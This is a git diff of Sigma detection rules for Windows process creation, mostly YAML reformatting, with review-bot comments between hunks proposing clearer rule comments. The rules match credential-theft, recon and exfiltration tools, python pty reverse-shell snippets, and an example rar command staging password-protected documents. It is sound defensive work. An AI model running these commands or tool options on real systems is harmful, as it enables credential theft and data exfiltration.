PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - 
--healthcheck + - '--server ' + condition: process_creation and (1 of selection_parent_* and selection_parent_ext and selection_cli) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml b/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml index 8c6455b88..cfb7be40a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml @@ -1,18 +1,13 @@ title: PUA - Process Hacker Execution id: 811e0002-b13b-4a15-9d00-a613fce66e42 related: - - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a - type: similar + - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a + type: similar status: experimental -description: 'Detects the execution of Process Hacker based on binary metadata information - (Image, Hash, Imphash, etc). - - Process Hacker is a tool to view and manipulate processes, kernel options and - other low level options. - +description: | + Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). + Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. - - ' references: - https://processhacker.sourceforge.io/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ 
@@ -35,13 +30,13 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|contains: \ProcessHacker_ - - NewProcessName|endswith: \ProcessHacker.exe - - OriginalFileName: - - ProcessHacker.exe - - Process Hacker - - Description: Process Hacker - - Product: Process Hacker + - NewProcessName|contains: \ProcessHacker_ + - NewProcessName|endswith: \ProcessHacker.exe + - OriginalFileName: + - ProcessHacker.exe + - Process Hacker + - Description: Process Hacker + - Product: Process Hacker selection_hashes: Hashes|contains: - MD5=68F9B52895F4D34E74112F3129B3B00D @@ -53,21 +48,20 @@ detection: - IMPHASH=3695333C60DEDECDCAFF1590409AA462 - IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF selection_hash_values: - - md5: - - 68f9b52895f4d34e74112f3129b3b00d - - b365af317ae730a67c936f21432b9c71 - - sha1: - - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e - - a0bdfac3ce1880b32ff9b696458327ce352e3b1d - - sha256: - - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f - - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 - - Imphash: - - 04de0ad9c37eb7bd52043d2ecac958df - - 3695333c60dedecdcaff1590409aa462 + - md5: + - 68f9b52895f4d34e74112f3129b3b00d + - b365af317ae730a67c936f21432b9c71 + - sha1: + - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e + - a0bdfac3ce1880b32ff9b696458327ce352e3b1d + - sha256: + - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f + - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 + - Imphash: + - 04de0ad9c37eb7bd52043d2ecac958df + - 3695333c60dedecdcaff1590409aa462 condition: process_creation and (1 of selection_*) falsepositives: - - While sometimes 'Process Hacker is used by legitimate administrators, the execution - of Process Hacker must be investigated and allowed on a case by case basis + - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml index dbaf6b02e..0af312a60 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml @@ -1,9 +1,7 @@ title: PUA - Potential PE Metadata Tamper Using Rcedit id: 0c92f2e6-f08f-4b73-9216-ecb0ca634689 status: test -description: Detects the use of rcedit to potentially alter executable PE metadata - properties, which could conceal efforts to rename system utilities for defense - evasion. +description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. references: - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915 @@ -25,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \rcedit-x64.exe - - \rcedit-x86.exe - - Description: Edit resources of exe - - Product: rcedit + - NewProcessName|endswith: + - \rcedit-x64.exe + - \rcedit-x86.exe + - Description: Edit resources of exe + - Product: rcedit selection_flags: - CommandLine|contains: --set- + CommandLine|contains: --set- # Covers multiple edit commands such as "--set-resource-string" or "--set-version-string" selection_attributes: - CommandLine|contains: + CommandLine|contains: - OriginalFileName - CompanyName - FileDescription 
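Review bot: The new comment on `CommandLine|contains: --set-` names only `--set-resource-string` and `--set-version-string`, but the substring also matches rcedit's other switches (`--set-icon`, `--set-file-version`, `--set-product-version`, `--set-requested-execution-level`), so it is `selection_attributes` — not this selector — that narrows the rule to identity-field tampering. Suggest `# Matches every rcedit --set-* switch; selection_attributes restricts the hit to identity fields (OriginalFilename, CompanyName, ...)`. Next to `- OriginalFileName` it is worth recording that Sigma string matching is case-insensitive by default, so this entry also covers the canonical VERSIONINFO key `OriginalFilename` that rcedit users usually type; without that note a later cleanup may "fix" the casing or add a duplicate. The rest of the attribute list and the `condition` are in the following hunk.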
@@ -42,7 +40,6 @@ detection: - LegalCopyright condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of the tool by administrators or users to update metadata of - a binary + - Legitimate use of the tool by administrators or users to update metadata of a binary level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml index e15da8d6e..af2297859 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml @@ -1,13 +1,12 @@ title: PUA - Rclone Execution id: e37db05d-d1f9-49c8-b464-cee1a4b11638 related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes status: test -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_specific_options: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection_rclone_img: - - NewProcessName|endswith: \rclone.exe - - Description: Rsync for cloud storage + - NewProcessName|endswith: \rclone.exe + - Description: Rsync for cloud storage selection_rclone_cli: - CommandLine|contains: + CommandLine|contains: - pass - user - copy 
diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml b/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml index 362d4e853..6bfe18226 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml @@ -1,8 +1,7 @@ title: PUA - RunXCmd Execution id: 93199800-b52a-4dec-b762-75212c196542 status: test -description: Detects the use of the RunXCmd tool to execute commands with System or - TrustedInstaller accounts +description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts references: - https://www.d7xtech.com/free-software/runx/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_account: - CommandLine|contains: + CommandLine|contains: - ' /account=system ' - ' /account=ti ' selection_exec: - CommandLine|contains: /exec= + CommandLine|contains: /exec= condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml b/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml index c825383d6..d61480cf5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml @@ -1,8 +1,7 @@ title: PUA - Seatbelt Execution id: 38646daa-e78f-4ace-9de0-55547b2d30da status: test -description: Detects the execution of the PUA/Recon tool Seatbelt via PE information - of command line parameters +description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters references: - https://github.com/GhostPack/Seatbelt - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html 
@@ -22,24 +21,29 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Seatbelt.exe - - OriginalFileName: Seatbelt.exe - - Description: Seatbelt - - CommandLine|contains: - - ' DpapiMasterKeys' - - ' InterestingProcesses' - - ' InterestingFiles' - - ' CertificateThumbprints' - - ' ChromiumBookmarks' - - ' ChromiumHistory' - - ' ChromiumPresence' - - ' CloudCredentials' - - ' CredEnum' - - ' CredGuard' - - ' FirefoxHistory' - - ' ProcessCreationEvents' + - NewProcessName|endswith: \Seatbelt.exe + - OriginalFileName: Seatbelt.exe + - Description: Seatbelt + - CommandLine|contains: + # This just a list of the commands that will produce the least amount of FP in "theory" + # Comment out/in as needed in your environment + # To get the full list of commands see reference section + - ' DpapiMasterKeys' + - ' InterestingProcesses' + - ' InterestingFiles' + - ' CertificateThumbprints' + - ' ChromiumBookmarks' + - ' ChromiumHistory' + - ' ChromiumPresence' + - ' CloudCredentials' + - ' CredEnum' + - ' CredGuard' + - ' FirefoxHistory' + - ' ProcessCreationEvents' + # - ' RDPSessions' + # - ' PowerShellHistory' selection_group_list: - CommandLine|contains: + CommandLine|contains: - ' -group=misc' - ' -group=remote' - ' -group=chromium' @@ -48,7 +52,7 @@ detection: - ' -group=user' - ' -group=all' selection_group_output: - CommandLine|contains: ' -outputfile=' + CommandLine|contains: ' -outputfile=' condition: process_creation and (selection_img or all of selection_group_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml b/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml index e4724f4bc..2542f9632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml 
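Review bot: The added comment explains FP tuning of the command-name list but not that, on this converted log source (`EventID: 4688`, `Channel: Security`), the `OriginalFileName: Seatbelt.exe` and `Description: Seatbelt` alternatives can never match — Security 4688 does not carry PE metadata fields — so only `NewProcessName` and the `CommandLine` tokens do the work here. Because `selection_img` is an OR list, the command tokens are matched against any process's command line regardless of image, which is presumably intentional (GhostPack tools are commonly rebuilt under another name) and worth stating: `# Command names are matched image-agnostically on purpose: Seatbelt is often recompiled/renamed`. A second one-liner, `# PE metadata fields are only populated by Sysmon/EDR sources, not by Security 4688`, would stop tuners from relying on them. The `condition` closing this block (`selection_img or all of selection_group_*`) is inside the hunk.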
@@ -1,11 +1,10 @@ title: PUA - System Informer Execution id: 5722dff1-4bdd-4949-86ab-fbaf707e767a related: - - id: 811e0002-b13b-4a15-9d00-a613fce66e42 - type: similar + - id: 811e0002-b13b-4a15-9d00-a613fce66e42 + type: similar status: experimental -description: Detects the execution of System Informer, a task manager tool to view - and manipulate processes, kernel options and other low level operations +description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations references: - https://github.com/winsiderss/systeminformer author: Florian Roth (Nextron Systems) 
@@ -26,24 +25,25 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \SystemInformer.exe - - OriginalFileName: SystemInformer.exe - - Description: System Informer - - Product: System Informer + - NewProcessName|endswith: \SystemInformer.exe + - OriginalFileName: SystemInformer.exe + - Description: System Informer + - Product: System Informer selection_hashes: Hashes|contains: + # Note: add other hashes as needed + # 3.0.11077.6550 - MD5=19426363A37C03C3ED6FEDF57B6696EC - SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - IMPHASH=B68908ADAEB5D662F87F2528AF318F12 selection_hash_values: - - md5: 19426363A37C03C3ED6FEDF57B6696EC - - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - - Imphash: B68908ADAEB5D662F87F2528AF318F12 + - md5: 19426363A37C03C3ED6FEDF57B6696EC + - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC + - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 + - Imphash: B68908ADAEB5D662F87F2528AF318F12 condition: process_creation and (1 of selection_*) falsepositives: - - System Informer is regularly used legitimately by system administrators or developers. - Apply additional filters accordingly + - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml b/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml index be5380bd5..fd9edd51f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_webbrowserpassview.yml 
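Review bot: The `# Note: add other hashes as needed` and `# 3.0.11077.6550` comments make clear that the hash selections pin a single build, but not that on this converted source (`EventID: 4688`, `Channel: Security`) neither `Hashes` nor `md5`/`sha1`/`sha256`/`Imphash` nor `OriginalFileName`/`Description`/`Product` are present in the event, so `NewProcessName|endswith: \SystemInformer.exe` is the only alternative that can fire here and a renamed binary is missed. Suggest stating it next to `selection_hashes:`: `# Hash/metadata selections need a Sysmon- or EDR-style source; Security 4688 only exposes NewProcessName/CommandLine`. If the list is extended, the `IMPHASH=` entry is the one most likely to hold across releases, while the MD5/SHA values change with every build. The `falsepositives` wording asking for additional filters remains consistent with that.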
@@ -1,10 +1,7 @@ title: PUA - WebBrowserPassView Execution id: d0dae994-26c6-4d2d-83b5-b3c8b79ae513 status: test -description: Detects the execution of WebBrowserPassView.exe. A password recovery - tool that reveals the passwords stored by the following Web browsers, Internet - Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, - Safari, and Opera +description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md author: frack113 @@ -21,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - Description: Web Browser Password Viewer - - NewProcessName|endswith: \WebBrowserPassView.exe + - Description: Web Browser Password Viewer + - NewProcessName|endswith: \WebBrowserPassView.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml index a143abbd2..569a8c6bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml 
@@ -1,9 +1,7 @@ title: PUA - Wsudo Suspicious Execution id: bdeeabc9-ff2a-4a51-be59-bb253aac7891 status: test -description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let - the user execute programs with different permissions (System, Trusted Installer, - Administrator...etc) +description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) references: - https://github.com/M2Team/Privexec/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: \wsudo.exe - - OriginalFileName: wsudo.exe - - Description: Windows sudo utility - - ParentProcessName|endswith: \wsudo-bridge.exe + - NewProcessName|endswith: \wsudo.exe + - OriginalFileName: wsudo.exe + - Description: Windows sudo utility + - ParentProcessName|endswith: \wsudo-bridge.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -u System - -uSystem - -u TrustedInstaller diff --git a/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml b/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml index ae27a91bc..778f36049 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_adidnsdump.yml 
@@ -1,12 +1,9 @@ title: PUA - Adidnsdump Execution id: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 status: test -description: 'This tool enables enumeration and exporting of all DNS records in the - zone for recon purposes of internal networks Python 3 and python.exe must be installed, - +description: | + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump author: frack113 @@ -23,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: adidnsdump - NewProcessName|endswith: \python.exe + CommandLine|contains: adidnsdump + NewProcessName|endswith: \python.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml index b9a4b8ccd..73f764060 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Python Inline Command Execution id: 899133d5-4d7c-4a7f-94ee-27355c879d90 status: test -description: Detects execution of python using the "-c" flag. This is could be used - as a way to launch a reverse shell or execute live python code. +description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. references: - https://docs.python.org/3/using/cmdline.html#cmdoption-c - https://www.revshells.com/ 
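Review bot: The description folded into the `|` block keeps the typo and run-on sentence of the old quoted scalar: `internal networks Python 3 and python.exe must be installed,` and `Usee to Query/modify DNS records`. Suggest `This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. Python 3 and python.exe must be installed.` followed by `Used to query/modify DNS records for Active Directory integrated DNS via LDAP.` The detection itself (next hunk) is only `CommandLine|contains: adidnsdump` with `NewProcessName|endswith: \python.exe`, so the description is the sole place that explains what an analyst is looking at.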
@@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: python.exe - - NewProcessName|endswith: - - python.exe - - python3.exe - - python2.exe + - OriginalFileName: python.exe + - NewProcessName|endswith: + - python.exe # no \ bc of e.g. ipython.exe + - python3.exe + - python2.exe selection_cli: - CommandLine|contains: ' -c' - filter_python: + CommandLine|contains: ' -c' + filter_python: # Based on baseline ParentCommandLine|contains: -E -s -m ensurepip -U --default-pip ParentProcessName|startswith: C:\Program Files\Python ParentProcessName|endswith: \python.exe @@ -36,7 +35,6 @@ detection: ParentProcessName|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Python libraries that use a flag starting with "-c". Filter according to your - environment + - Python libraries that use a flag starting with "-c". Filter according to your environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml b/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml index 8ec75bf8c..c04ca22a9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_python_pty_spawn.yml @@ -1,8 +1,8 @@ title: Python Spawning Pretty TTY on Windows id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d related: - - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 - type: derived + - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 + type: derived status: test description: Detects python spawning a pretty tty references: 
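Review bot: The new comment `# no \ bc of e.g. ipython.exe` is cryptic for a deliberate loosening of `NewProcessName|endswith: python.exe`; spell it out as `# Intentionally no leading backslash so that e.g. ipython.exe also matches`. `' -c'` is likewise a prefix match that fires on any `-c…` argument (e.g. `-cfg`), which the `falsepositives` entry acknowledges but a local comment on `selection_cli` would make explicit: `# prefix match: also hits -cfg, -check, ... - tune filter_* per environment`. The `# Based on baseline` note on `filter_python` would be more useful with the observation behind it, i.e. that `ensurepip` runs spawned by a `C:\Program Files\Python…\python.exe` parent were the recurring benign case. The second filter and the `condition` are in the next hunk.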
@@ -20,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: - - python.exe + NewProcessName|endswith: + - python.exe # no \ bc of e.g. ipython.exe - python3.exe - python2.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - import pty - .spawn( selection_cli_2: - CommandLine|contains: from pty import spawn + CommandLine|contains: from pty import spawn condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml b/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml index e224e5be1..560681d4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml +++ b/sigma/builtin/process_creation/proc_creation_win_query_session_exfil.yml @@ -1,8 +1,7 @@ title: Query Usage To Exfil Data id: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 status: test -description: Detects usage of "query.exe" a system binary to exfil information such - as "sessions" and "processes" for later use +description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - session > - process > - NewProcessName|endswith: :\Windows\System32\query.exe + NewProcessName|endswith: :\Windows\System32\query.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml b/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml index 0825a007f..26ff9b45d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml 
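Review bot: The comment `# no \ bc of e.g. ipython.exe` is an abbreviation that should be spelled out, e.g. `# Intentionally no leading backslash so that e.g. ipython.exe also matches`. A second caveat worth recording near `selection_cli_1`: as far as I know CPython's `pty` module depends on `termios`/`tty` and is unavailable on Windows, so on this platform the rule flags the attempt — typically a copy-pasted Unix reverse-shell one-liner — rather than a working TTY; still a strong signal, but it changes how an analyst triages the hit. Suggest `# pty is Unix-only in CPython; on Windows this flags the attempted (copy-pasted) shell upgrade, not a working TTY`. Both `CommandLine` selections and the `condition` are fully within this hunk.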
+++ b/sigma/builtin/process_creation/proc_creation_win_rar_compress_data.yml @@ -1,10 +1,7 @@ title: Files Added To An Archive Using Rar.EXE id: 6f3e2987-db24-4c78-a860-b4f4095a7095 status: test -description: Detects usage of "rar" to add files to an archive for potential compression. - An adversary may compress data (e.g. sensitive documents) that is collected prior - to exfiltration in order to make it portable and minimize the amount of data sent - over the network. +description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html @@ -22,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' a ' - NewProcessName|endswith: \rar.exe + CommandLine|contains: ' a ' + NewProcessName|endswith: \rar.exe condition: process_creation and selection falsepositives: - Highly likely if rar is a default archiver in the monitored environment. diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml b/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml index 559de6f80..b9618d17c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rar_compression_with_password.yml 
@@ -1,9 +1,7 @@ title: Rar Usage with Password and Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: test -description: Detects the use of rar.exe, on the command line, to create an archive - with password protection or with a specific compression level. This is pretty - indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - https://ss64.com/bash/rar.html @@ -22,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection_password: - CommandLine|contains: ' -hp' + CommandLine|contains: ' -hp' selection_other: - CommandLine|contains: + CommandLine|contains: - ' -m' - ' a ' condition: process_creation and (selection_password and selection_other) diff --git a/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml b/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml index a6fac3d45..899a22d34 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rar_susp_greedy_compression.yml @@ -1,8 +1,7 @@ title: Suspicious Greedy Compression Using Rar.EXE id: afe52666-401e-4a02-b4ff-5d128990b8cb status: experimental -description: Detects RAR usage that creates an archive from a suspicious folder, either - a system folder or one of the folders often used by attackers for staging purposes +description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes references: - https://decoded.avast.io/martinchlumecky/png-steganography author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) 
@@ -15,22 +14,23 @@ logsource: product: windows category: process_creation detection: + # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul process_creation: EventID: 4688 Channel: Security selection_opt_1: - - NewProcessName|endswith: \rar.exe - - Description: Command line RAR + - NewProcessName|endswith: \rar.exe + - Description: Command line RAR selection_opt_2: - CommandLine|contains: + CommandLine|contains: - '.exe a ' - ' a -m' selection_cli_flags: - CommandLine|contains|all: - - ' -hp' - - ' -r ' + CommandLine|contains|all: + - ' -hp' # password + - ' -r ' # recursive selection_cli_folders: - CommandLine|contains: + CommandLine|contains: - ' ?:\\\*.' - ' ?:\\\\\*.' - ' ?:\$Recycle.bin\' diff --git a/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml index 11601d63b..80dc38980 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rasdial_execution.yml @@ -19,10 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: rasdial.exe + NewProcessName|endswith: rasdial.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml b/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml index 69bc032ad..ad28fe081 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml 
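Review bot: The `# password` annotation on `' -hp'` is imprecise: `-hp` is rar's switch for encrypting archive headers as well as file data, and a plain `-p` (data only) does not satisfy `selection_cli_flags`, which requires both `' -hp'` and `' -r '`; writing it as `- ' -hp' # password with header encryption (plain -p is not matched)` makes the narrower scope explicit. The `# Example :` command line added under `detection:` is useful reference material; stating which selections it is meant to satisfy (the `-hp`/`-r` switches for `selection_cli_flags`, the `c:\\*.doc` style arguments presumably for `selection_cli_folders`) would turn it into a reviewable test case rather than an opaque sample.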
